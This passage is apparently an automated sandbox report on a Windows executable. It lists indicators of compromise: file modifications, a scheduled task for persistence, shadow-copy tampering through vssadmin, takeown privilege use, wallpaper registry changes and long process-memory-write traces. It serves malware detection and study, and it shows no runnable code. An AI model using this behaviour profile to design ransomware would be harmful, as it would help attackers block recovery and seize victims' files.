Files\VideoLAN\VLC\lua\playlist\bbc_co_uk.luac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Beirut a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Anadyr a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME.txt a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.zh_CN_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1340 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 360 vssadmin.exe -
Modifies Control Panel 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop reg.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\WallpaperStyle = "0" reg.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\TileWallpaper = "0" reg.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1656 RzKn8STp64.exe 1656 RzKn8STp64.exe 1656 RzKn8STp64.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 1656 RzKn8STp64.exe -
Suspicious use of AdjustPrivilegeToken 96 IoCs
description pid Process Token: SeDebugPrivilege 1656 RzKn8STp64.exe Token: SeLoadDriverPrivilege 1656 RzKn8STp64.exe Token: SeTakeOwnershipPrivilege 1256 takeown.exe Token: SeTakeOwnershipPrivilege 1784 takeown.exe Token: SeTakeOwnershipPrivilege 1680 takeown.exe Token: SeTakeOwnershipPrivilege 1260 takeown.exe Token: SeBackupPrivilege 1328 vssvc.exe Token: SeRestorePrivilege 1328 vssvc.exe Token: SeAuditPrivilege 1328 vssvc.exe Token: SeTakeOwnershipPrivilege 832 takeown.exe Token: SeTakeOwnershipPrivilege 1996 takeown.exe Token: SeTakeOwnershipPrivilege 1488 takeown.exe Token: SeIncreaseQuotaPrivilege 1776 WMIC.exe Token: SeSecurityPrivilege 1776 WMIC.exe Token: SeTakeOwnershipPrivilege 1776 WMIC.exe Token: SeLoadDriverPrivilege 1776 WMIC.exe Token: SeSystemProfilePrivilege 1776 WMIC.exe Token: SeSystemtimePrivilege 1776 WMIC.exe Token: SeProfSingleProcessPrivilege 1776 WMIC.exe Token: SeIncBasePriorityPrivilege 1776 WMIC.exe Token: SeCreatePagefilePrivilege 1776 WMIC.exe Token: SeBackupPrivilege 1776 WMIC.exe Token: SeRestorePrivilege 1776 WMIC.exe Token: SeShutdownPrivilege 1776 WMIC.exe Token: SeDebugPrivilege 1776 WMIC.exe Token: SeSystemEnvironmentPrivilege 1776 WMIC.exe Token: SeRemoteShutdownPrivilege 1776 WMIC.exe Token: SeUndockPrivilege 1776 WMIC.exe Token: SeManageVolumePrivilege 1776 WMIC.exe Token: 33 1776 WMIC.exe Token: 34 1776 WMIC.exe Token: 35 1776 WMIC.exe Token: SeIncreaseQuotaPrivilege 1776 WMIC.exe Token: SeSecurityPrivilege 1776 WMIC.exe Token: SeTakeOwnershipPrivilege 1776 WMIC.exe Token: SeLoadDriverPrivilege 1776 WMIC.exe Token: SeSystemProfilePrivilege 1776 WMIC.exe Token: SeSystemtimePrivilege 1776 WMIC.exe Token: SeProfSingleProcessPrivilege 1776 WMIC.exe Token: SeIncBasePriorityPrivilege 1776 WMIC.exe Token: SeCreatePagefilePrivilege 1776 WMIC.exe Token: SeBackupPrivilege 1776 WMIC.exe Token: SeRestorePrivilege 1776 WMIC.exe Token: SeShutdownPrivilege 1776 WMIC.exe Token: SeDebugPrivilege 1776 WMIC.exe Token: SeSystemEnvironmentPrivilege 1776 WMIC.exe Token: SeRemoteShutdownPrivilege 1776 WMIC.exe Token: SeUndockPrivilege 1776 WMIC.exe Token: SeManageVolumePrivilege 1776 WMIC.exe Token: 33 1776 WMIC.exe Token: 34 1776 WMIC.exe Token: 35 1776 WMIC.exe Token: SeTakeOwnershipPrivilege 1472 takeown.exe Token: SeTakeOwnershipPrivilege 1152 takeown.exe Token: SeTakeOwnershipPrivilege 1516 takeown.exe Token: SeTakeOwnershipPrivilege 1228 takeown.exe Token: SeTakeOwnershipPrivilege 1960 takeown.exe Token: SeTakeOwnershipPrivilege 1584 takeown.exe Token: SeTakeOwnershipPrivilege 1088 takeown.exe Token: SeTakeOwnershipPrivilege 796 takeown.exe Token: SeTakeOwnershipPrivilege 1112 takeown.exe Token: SeTakeOwnershipPrivilege 1460 takeown.exe Token: SeTakeOwnershipPrivilege 228 takeown.exe Token: SeTakeOwnershipPrivilege 1556 takeown.exe Token: SeTakeOwnershipPrivilege 1944 takeown.exe Token: SeTakeOwnershipPrivilege 2040 takeown.exe Token: SeTakeOwnershipPrivilege 972 takeown.exe Token: SeTakeOwnershipPrivilege 564 takeown.exe Token: SeTakeOwnershipPrivilege 908 takeown.exe Token: SeTakeOwnershipPrivilege 1964 takeown.exe Token: SeTakeOwnershipPrivilege 1472 takeown.exe Token: SeTakeOwnershipPrivilege 920 takeown.exe Token: SeTakeOwnershipPrivilege 224 takeown.exe Token: SeTakeOwnershipPrivilege 1120 takeown.exe Token: SeTakeOwnershipPrivilege 1996 takeown.exe Token: SeTakeOwnershipPrivilege 228 takeown.exe Token: SeTakeOwnershipPrivilege 1584 takeown.exe Token: SeTakeOwnershipPrivilege 680 takeown.exe Token: SeTakeOwnershipPrivilege 1468 takeown.exe Token: SeTakeOwnershipPrivilege 1152 takeown.exe Token: SeTakeOwnershipPrivilege 952 takeown.exe Token: SeTakeOwnershipPrivilege 360 takeown.exe Token: SeTakeOwnershipPrivilege 1212 takeown.exe Token: SeTakeOwnershipPrivilege 1936 takeown.exe Token: SeTakeOwnershipPrivilege 972 takeown.exe Token: SeTakeOwnershipPrivilege 1556 takeown.exe Token: SeTakeOwnershipPrivilege 1232 takeown.exe Token: SeTakeOwnershipPrivilege 1960 takeown.exe Token: SeTakeOwnershipPrivilege 952 takeown.exe Token: SeTakeOwnershipPrivilege 1956 takeown.exe Token: SeTakeOwnershipPrivilege 564 takeown.exe Token: SeTakeOwnershipPrivilege 1556 takeown.exe Token: SeTakeOwnershipPrivilege 1488 takeown.exe Token: SeTakeOwnershipPrivilege 1748 takeown.exe Token: SeTakeOwnershipPrivilege 1168 takeown.exe Token: SeTakeOwnershipPrivilege 856 takeown.exe -
Suspicious use of WriteProcessMemory 4362 IoCs
description pid Process procid_target PID 616 wrote to memory of 1804 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 26 PID 616 wrote to memory of 1804 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 26 PID 616 wrote to memory of 1804 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 26 PID 616 wrote to memory of 1804 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 26 PID 616 wrote to memory of 1844 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 28 PID 616 wrote to memory of 1844 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 28 PID 616 wrote to memory of 1844 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 28 PID 616 wrote to memory of 1844 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 28 PID 616 wrote to memory of 1432 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 33 PID 616 wrote to memory of 1432 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 33 PID 616 wrote to memory of 1432 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 33 PID 616 wrote to memory of 1432 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 33 PID 616 wrote to memory of 2044 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 34 PID 616 wrote to memory of 2044 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 34 PID 616 wrote to memory of 2044 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 34 PID 616 wrote to memory of 2044 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 34 PID 2044 wrote to memory of 1488 2044 cmd.exe 37 PID 2044 wrote to memory of 1488 2044 cmd.exe 37 PID 2044 wrote to memory of 1488 2044 cmd.exe 37 PID 2044 wrote to memory of 1488 2044 cmd.exe 37 PID 1432 wrote to memory of 1796 1432 cmd.exe 38 PID 1432 wrote to memory of 1796 1432 cmd.exe 38 PID 1432 wrote to memory of 1796 1432 cmd.exe 38 PID 1432 wrote to memory of 1796 1432 cmd.exe 38 PID 1432 wrote to memory of 1824 1432 cmd.exe 39 PID 1432 wrote to memory of 1824 1432 cmd.exe 39 PID 1432 wrote to memory of 1824 1432 cmd.exe 39 PID 1432 wrote to memory of 1824 1432 cmd.exe 39 PID 1432 wrote to memory of 1860 1432 cmd.exe 40 PID 1432 wrote to memory of 1860 1432 cmd.exe 40 PID 1432 wrote to memory of 1860 1432 cmd.exe 40 PID 1432 wrote to memory of 1860 1432 cmd.exe 40 PID 616 wrote to memory of 1740 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 41 PID 616 wrote to memory of 1740 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 41 PID 616 wrote to memory of 1740 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 41 PID 616 wrote to memory of 1740 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 41 PID 1740 wrote to memory of 1944 1740 cmd.exe 43 PID 1740 wrote to memory of 1944 1740 cmd.exe 43 PID 1740 wrote to memory of 1944 1740 cmd.exe 43 PID 1740 wrote to memory of 1944 1740 cmd.exe 43 PID 1740 wrote to memory of 2024 1740 cmd.exe 44 PID 1740 wrote to memory of 2024 1740 cmd.exe 44 PID 1740 wrote to memory of 2024 1740 cmd.exe 44 PID 1740 wrote to memory of 2024 1740 cmd.exe 44 PID 1740 wrote to memory of 1356 1740 cmd.exe 46 PID 1740 wrote to memory of 1356 1740 cmd.exe 46 PID 1740 wrote to memory of 1356 1740 cmd.exe 46 PID 1740 wrote to memory of 1356 1740 cmd.exe 46 PID 1356 wrote to memory of 928 1356 cmd.exe 47 PID 1356 wrote to memory of 928 1356 cmd.exe 47 PID 1356 wrote to memory of 928 1356 cmd.exe 47 PID 1356 wrote to memory of 928 1356 cmd.exe 47 PID 928 wrote to memory of 1656 928 RzKn8STp.exe 48 PID 928 wrote to memory of 1656 928 RzKn8STp.exe 48 PID 928 wrote to memory of 1656 928 RzKn8STp.exe 48 PID 928 wrote to memory of 1656 928 RzKn8STp.exe 48 PID 1488 wrote to memory of 1408 1488 wscript.exe 49 PID 1488 wrote to memory of 1408 1488 wscript.exe 49 PID 1488 wrote to memory of 1408 1488 wscript.exe 49 PID 1488 wrote to memory of 1408 1488 wscript.exe 49 PID 1408 wrote to memory of 1340 1408 cmd.exe 51 PID 1408 wrote to memory of 1340 1408 cmd.exe 51 PID 1408 wrote to memory of 1340 1408 cmd.exe 51 PID 1408 wrote to memory of 1340 1408 cmd.exe 51 PID 616 wrote to memory of 792 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 52 PID 616 wrote to memory of 792 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 52 PID 616 wrote to memory of 792 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 52 PID 616 wrote to memory of 792 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 52 PID 792 wrote to memory of 1560 792 cmd.exe 54 PID 792 wrote to memory of 1560 792 cmd.exe 54 PID 792 wrote to memory of 1560 792 cmd.exe 54 PID 792 wrote to memory of 1560 792 cmd.exe 54 PID 792 wrote to memory of 1400 792 cmd.exe 55 PID 792 wrote to memory of 1400 792 cmd.exe 55 PID 792 wrote to memory of 1400 792 cmd.exe 55 PID 792 wrote to memory of 1400 792 cmd.exe 55 PID 792 wrote to memory of 1220 792 cmd.exe 56 PID 792 wrote to memory of 1220 792 cmd.exe 56 PID 792 wrote to memory of 1220 792 cmd.exe 56 PID 792 wrote to memory of 1220 792 cmd.exe 56 PID 1220 wrote to memory of 2036 1220 cmd.exe 57 PID 1220 wrote to memory of 2036 1220 cmd.exe 57 PID 1220 wrote to memory of 2036 1220 cmd.exe 57 PID 1220 wrote to memory of 2036 1220 cmd.exe 57 PID 792 wrote to memory of 1640 792 cmd.exe 58 PID 792 wrote to memory of 1640 792 cmd.exe 58 PID 792 wrote to memory of 1640 792 cmd.exe 58 PID 792 wrote to memory of 1640 792 cmd.exe 58 PID 616 wrote to memory of 1940 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 59 PID 616 wrote to memory of 1940 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 59 PID 616 wrote to memory of 1940 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 59 PID 616 wrote to memory of 1940 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 59 PID 1940 wrote to memory of 2024 1940 cmd.exe 61 PID 1940 wrote to memory of 2024 1940 cmd.exe 61 PID 1940 wrote to memory of 2024 1940 cmd.exe 61 PID 1940 wrote to memory of 2024 1940 cmd.exe 61 PID 1940 wrote to memory of 1028 1940 cmd.exe 62 PID 1940 wrote to memory of 1028 1940 cmd.exe 62 PID 1940 wrote to memory of 1028 1940 cmd.exe 62 PID 1940 wrote to memory of 1028 1940 cmd.exe 62 PID 1940 wrote to memory of 860 1940 cmd.exe 63 PID 1940 wrote to memory of 860 1940 cmd.exe 63 PID 1940 wrote to memory of 860 1940 cmd.exe 63 PID 1940 wrote to memory of 860 1940 cmd.exe 63 PID 860 wrote to memory of 1088 860 cmd.exe 64 PID 860 wrote to memory of 1088 860 cmd.exe 64 PID 860 wrote to memory of 1088 860 cmd.exe 64 PID 860 wrote to memory of 1088 860 cmd.exe 64 PID 1940 wrote to memory of 1868 1940 cmd.exe 65 PID 1940 wrote to memory of 1868 1940 cmd.exe 65 PID 1940 wrote to memory of 1868 1940 cmd.exe 65 PID 1940 wrote to memory of 1868 1940 cmd.exe 65 PID 616 wrote to memory of 1784 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 66 PID 616 wrote to memory of 1784 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 66 PID 616 wrote to memory of 1784 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 66 PID 616 wrote to memory of 1784 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 66 PID 1488 wrote to memory of 680 1488 wscript.exe 68 PID 1488 wrote to memory of 680 1488 wscript.exe 68 PID 1488 wrote to memory of 680 1488 wscript.exe 68 PID 1488 wrote to memory of 680 1488 wscript.exe 68 PID 1784 wrote to memory of 1060 1784 cmd.exe 69 PID 1784 wrote to memory of 1060 1784 cmd.exe 69 PID 1784 wrote to memory of 1060 1784 cmd.exe 69 PID 1784 wrote to memory of 1060 1784 cmd.exe 69 PID 680 wrote to memory of 1400 680 cmd.exe 71 PID 680 wrote to memory of 1400 680 cmd.exe 71 PID 680 wrote to memory of 1400 680 cmd.exe 71 PID 680 wrote to memory of 1400 680 cmd.exe 71 PID 1784 wrote to memory of 1468 1784 cmd.exe 72 PID 1784 wrote to memory of 1468 1784 cmd.exe 72 PID 1784 wrote to memory of 1468 1784 cmd.exe 72 PID 1784 wrote to memory of 1468 1784 cmd.exe 72 PID 1784 wrote to memory of 2036 1784 cmd.exe 73 PID 1784 wrote to memory of 2036 1784 cmd.exe 73 PID 1784 wrote to memory of 2036 1784 cmd.exe 73 PID 1784 wrote to memory of 2036 1784 cmd.exe 73 PID 2036 wrote to memory of 1584 2036 cmd.exe 75 PID 2036 wrote to memory of 1584 2036 cmd.exe 75 PID 2036 wrote to memory of 1584 2036 cmd.exe 75 PID 2036 wrote to memory of 1584 2036 cmd.exe 75 PID 1784 wrote to memory of 2012 1784 cmd.exe 76 PID 1784 wrote to memory of 2012 1784 cmd.exe 76 PID 1784 wrote to memory of 2012 1784 cmd.exe 76 PID 1784 wrote to memory of 2012 1784 cmd.exe 76 PID 616 wrote to memory of 972 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 77 PID 616 wrote to memory of 972 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 77 PID 616 wrote to memory of 972 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 77 PID 616 wrote to memory of 972 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 77 PID 288 wrote to memory of 860 288 taskeng.exe 79 PID 288 wrote to memory of 860 288 taskeng.exe 79 PID 288 wrote to memory of 860 288 taskeng.exe 79 PID 972 wrote to memory of 884 972 cmd.exe 80 PID 972 wrote to memory of 884 972 cmd.exe 80 PID 972 wrote to memory of 884 972 cmd.exe 80 PID 972 wrote to memory of 884 972 cmd.exe 80 PID 972 wrote to memory of 1996 972 cmd.exe 81 PID 972 wrote to memory of 1996 972 cmd.exe 81 PID 972 wrote to memory of 1996 972 cmd.exe 81 PID 972 wrote to memory of 1996 972 cmd.exe 81 PID 972 wrote to memory of 1964 972 cmd.exe 82 PID 972 wrote to memory of 1964 972 cmd.exe 82 PID 972 wrote to memory of 1964 972 cmd.exe 82 PID 972 wrote to memory of 1964 972 cmd.exe 82 PID 1964 wrote to memory of 1212 1964 cmd.exe 83 PID 1964 wrote to memory of 1212 1964 cmd.exe 83 PID 1964 wrote to memory of 1212 1964 cmd.exe 83 PID 1964 wrote to memory of 1212 1964 cmd.exe 83 PID 972 wrote to memory of 472 972 cmd.exe 84 PID 972 wrote to memory of 472 972 cmd.exe 84 PID 972 wrote to memory of 472 972 cmd.exe 84 PID 972 wrote to memory of 472 972 cmd.exe 84 PID 616 wrote to memory of 2032 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 85 PID 616 wrote to memory of 2032 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 85 PID 616 wrote to memory of 2032 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 85 PID 616 wrote to memory of 2032 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 85 PID 2032 wrote to memory of 1488 2032 cmd.exe 87 PID 2032 wrote to memory of 1488 2032 cmd.exe 87 PID 2032 wrote to memory of 1488 2032 cmd.exe 87 PID 2032 wrote to memory of 1488 2032 cmd.exe 87 PID 2032 wrote to memory of 1256 2032 cmd.exe 88 PID 2032 wrote to memory of 1256 2032 cmd.exe 88 PID 2032 wrote to memory of 1256 2032 cmd.exe 88 PID 2032 wrote to memory of 1256 2032 cmd.exe 88 PID 2032 wrote to memory of 1068 2032 cmd.exe 89 PID 2032 wrote to memory of 1068 2032 cmd.exe 89 PID 2032 wrote to memory of 1068 2032 cmd.exe 89 PID 2032 wrote to memory of 1068 2032 cmd.exe 89 PID 1068 wrote to memory of 1060 1068 cmd.exe 90 PID 1068 wrote to memory of 1060 1068 cmd.exe 90 PID 1068 wrote to memory of 1060 1068 cmd.exe 90 PID 1068 wrote to memory of 1060 1068 cmd.exe 90 PID 2032 wrote to memory of 1684 2032 cmd.exe 91 PID 2032 wrote to memory of 1684 2032 cmd.exe 91 PID 2032 wrote to memory of 1684 2032 cmd.exe 91 PID 2032 wrote to memory of 1684 2032 cmd.exe 91 PID 616 wrote to memory of 680 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 92 PID 616 wrote to memory of 680 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 92 PID 616 wrote to memory of 680 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 92 PID 616 wrote to memory of 680 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 92 PID 680 wrote to memory of 1556 680 cmd.exe 94 PID 680 wrote to memory of 1556 680 cmd.exe 94 PID 680 wrote to memory of 1556 680 cmd.exe 94 PID 680 wrote to memory of 1556 680 cmd.exe 94 PID 680 wrote to memory of 1784 680 cmd.exe 95 PID 680 wrote to memory of 1784 680 cmd.exe 95 PID 680 wrote to memory of 1784 680 cmd.exe 95 PID 680 wrote to memory of 1784 680 cmd.exe 95 PID 680 wrote to memory of 1868 680 cmd.exe 96 PID 680 wrote to memory of 1868 680 cmd.exe 96 PID 680 wrote to memory of 1868 680 cmd.exe 96 PID 680 wrote to memory of 1868 680 cmd.exe 96 PID 1868 wrote to memory of 1188 1868 cmd.exe 97 PID 1868 wrote to memory of 1188 1868 cmd.exe 97 PID 1868 wrote to memory of 1188 1868 cmd.exe 97 PID 1868 wrote to memory of 1188 1868 cmd.exe 97 PID 680 wrote to memory of 1212 680 cmd.exe 98 PID 680 wrote to memory of 1212 680 cmd.exe 98 PID 680 wrote to memory of 1212 680 cmd.exe 98 PID 680 wrote to memory of 1212 680 cmd.exe 98 PID 616 wrote to memory of 564 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 99 PID 616 wrote to memory of 564 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 99 PID 616 wrote to memory of 564 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 99 PID 616 wrote to memory of 564 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 99 PID 564 wrote to memory of 1948 564 cmd.exe 101 PID 564 wrote to memory of 1948 564 cmd.exe 101 PID 564 wrote to memory of 1948 564 cmd.exe 101 PID 564 wrote to memory of 1948 564 cmd.exe 101 PID 564 wrote to memory of 1680 564 cmd.exe 102 PID 564 wrote to memory of 1680 564 cmd.exe 102 PID 564 wrote to memory of 1680 564 cmd.exe 102 PID 564 wrote to memory of 1680 564 cmd.exe 102 PID 564 wrote to memory of 1808 564 cmd.exe 103 PID 564 wrote to memory of 1808 564 cmd.exe 103 PID 564 wrote to memory of 1808 564 cmd.exe 103 PID 564 wrote to memory of 1808 564 cmd.exe 103 PID 1808 wrote to memory of 1092 1808 cmd.exe 104 PID 1808 wrote to memory of 1092 1808 cmd.exe 104 PID 1808 wrote to memory of 1092 1808 cmd.exe 104 PID 1808 wrote to memory of 1092 1808 cmd.exe 104 PID 564 wrote to memory of 1328 564 cmd.exe 105 PID 564 wrote to memory of 1328 564 cmd.exe 105 PID 564 wrote to memory of 1328 564 cmd.exe 105 PID 564 wrote to memory of 1328 564 cmd.exe 105 PID 616 wrote to memory of 1956 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 107 PID 616 wrote to memory of 1956 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 107 PID 616 wrote to memory of 1956 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 107 PID 616 wrote to memory of 1956 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 107 PID 1956 wrote to memory of 1220 1956 cmd.exe 109 PID 1956 wrote to memory of 1220 1956 cmd.exe 109 PID 1956 wrote to memory of 1220 1956 cmd.exe 109 PID 1956 wrote to memory of 1220 1956 cmd.exe 109 PID 1956 wrote to memory of 1260 1956 cmd.exe 110 PID 1956 wrote to memory of 1260 1956 cmd.exe 110 PID 1956 wrote to memory of 1260 1956 cmd.exe 110 PID 1956 wrote to memory of 1260 1956 cmd.exe 110 PID 1956 wrote to memory of 1556 1956 cmd.exe 111 PID 1956 wrote to memory of 1556 1956 cmd.exe 111 PID 1956 wrote to memory of 1556 1956 cmd.exe 111 PID 1956 wrote to memory of 1556 1956 cmd.exe 111 PID 860 wrote to memory of 360 860 cmd.exe 112 PID 860 wrote to memory of 360 860 cmd.exe 112 PID 860 wrote to memory of 360 860 cmd.exe 112 PID 1556 wrote to memory of 688 1556 cmd.exe 113 PID 1556 wrote to memory of 688 1556 cmd.exe 113 PID 1556 wrote to memory of 688 1556 cmd.exe 113 PID 1556 wrote to memory of 688 1556 cmd.exe 113 PID 1956 wrote to memory of 1996 1956 cmd.exe 114 PID 1956 wrote to memory of 1996 1956 cmd.exe 114 PID 1956 wrote to memory of 1996 1956 cmd.exe 114 PID 1956 wrote to memory of 1996 1956 cmd.exe 114 PID 616 wrote to memory of 1868 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 115 PID 616 wrote to memory of 1868 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 115 PID 616 wrote to memory of 1868 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 115 PID 616 wrote to memory of 1868 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 115 PID 1868 wrote to memory of 1960 1868 cmd.exe 117 PID 1868 wrote to memory of 1960 1868 cmd.exe 117 PID 1868 wrote to memory of 1960 1868 cmd.exe 117 PID 1868 wrote to memory of 1960 1868 cmd.exe 117 PID 1868 wrote to memory of 1560 1868 cmd.exe 118 PID 1868 wrote to memory of 1560 1868 cmd.exe 118 PID 1868 wrote to memory of 1560 1868 cmd.exe 118 PID 1868 wrote to memory of 1560 1868 cmd.exe 118 PID 1868 wrote to memory of 1408 1868 cmd.exe 119 PID 1868 wrote to memory of 1408 1868 cmd.exe 119 PID 1868 wrote to memory of 1408 1868 cmd.exe 119 PID 1868 wrote to memory of 1408 1868 cmd.exe 119 PID 1408 wrote to memory of 832 1408 cmd.exe 120 PID 1408 wrote to memory of 832 1408 cmd.exe 120 PID 1408 wrote to memory of 832 1408 cmd.exe 120 PID 1408 wrote to memory of 832 1408 cmd.exe 120 PID 1868 wrote to memory of 1488 1868 cmd.exe 121 PID 1868 wrote to memory of 1488 1868 cmd.exe 121 PID 1868 wrote to memory of 1488 1868 cmd.exe 121 PID 1868 wrote to memory of 1488 1868 cmd.exe 121 PID 616 wrote to memory of 1032 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 122 PID 616 wrote to memory of 1032 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 122 PID 616 wrote to memory of 1032 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 122 PID 616 wrote to memory of 1032 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 122 PID 1032 wrote to memory of 1684 1032 cmd.exe 125 PID 1032 wrote to memory of 1684 1032 cmd.exe 125 PID 1032 wrote to memory of 1684 1032 cmd.exe 125 PID 1032 wrote to memory of 1684 1032 cmd.exe 125 PID 1032 wrote to memory of 1332 1032 cmd.exe 127 PID 1032 wrote to memory of 1332 1032 cmd.exe 127 PID 1032 wrote to memory of 1332 1032 cmd.exe 127 PID 1032 wrote to memory of 1332 1032 cmd.exe 127 PID 1032 wrote to memory of 1944 1032 cmd.exe 128 PID 1032 wrote to memory of 1944 1032 cmd.exe 128 PID 1032 wrote to memory of 1944 1032 cmd.exe 128 PID 1032 wrote to memory of 1944 1032 cmd.exe 128 PID 1944 wrote to memory of 1020 1944 cmd.exe 129 PID 1944 wrote to memory of 1020 1944 cmd.exe 129 PID 1944 wrote to memory of 1020 1944 cmd.exe 129 PID 1944 wrote to memory of 1020 1944 cmd.exe 129 PID 